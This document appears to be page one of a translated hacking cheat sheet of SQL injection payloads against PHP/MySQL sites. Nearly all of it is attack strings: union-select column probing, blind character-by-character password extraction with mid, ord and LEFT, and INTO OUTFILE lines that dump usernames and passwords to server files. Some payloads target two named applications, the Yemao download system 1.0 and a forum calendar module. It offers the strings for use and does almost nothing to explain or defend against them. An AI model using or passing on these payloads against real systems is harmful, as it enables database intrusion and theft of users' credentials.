Advanced PHP Injection Methods Collection, Page 1/2

Date: 2021-05-28

'%23

' and passWord='mypass

id=-1 union select 1,1,1

id=-1 union select char(97),char(97),char(97)

id=1 union select 1,1,1 from members

id=1 union select 1,1,1 from admin

id=1 union select 1,1,1 from user

userid=1 and password=mypass

userid=1 and mid(password,3,1)=char(112)

userid=1 and mid(password,4,1)=char(97)

and ord(mid(password,3,1))>111 (the ord function is very handy; it returns an integer)

' and LENGTH(password)='6 (probes the password length)

' and LEFT(password,1)='m

' and LEFT(password,2)='my

………………………… and so on

' union select 1,username,password from user/*


=' union select 1,username,password from user/* (can be 1, or placed directly after the =)

99999' union select 1,username,password from user/*

' into outfile 'c:/file.txt (exports to a file)

=' or 1=1 into outfile 'c:/file.txt

1' union select 1,username,password from user into outfile 'c:/user.txt

select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'

id=' union select 1,username,password from user into outfile

id=-1 union select 1,database(),version() (apply queries flexibly)

Common query test statements:

select * FROM table where 1=1

select * FROM table where 'uuu'='uuu'

select * FROM table where 1<>2

select * FROM table where 3>2

select * FROM table where 2<3

select * FROM table where 1

select * FROM table where 1+1

select * FROM table where 1--1

select * FROM table where ISNULL(NULL)

select * FROM table where ISNULL(COT(0))

select * FROM table where 1 IS NOT NULL

select * FROM table where NULL IS NULL

select * FROM table where 2 BETWEEN 1 AND 3

select * FROM table where 'b' BETWEEN 'a' AND 'c'

select * FROM table where 2 IN (0,1,2)

select * FROM table where CASE WHEN 1>0 THEN 1 END

Example: 夜猫 (Yemao) download system, version 1.0

id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1

union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (substitute columns to find the password)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (verifies the first character of the password)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (second character)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51

…………………………………………………………

Example 2: 灰色轨迹 (Huise Guiji), varying the id to test (meteor)

union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate

union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate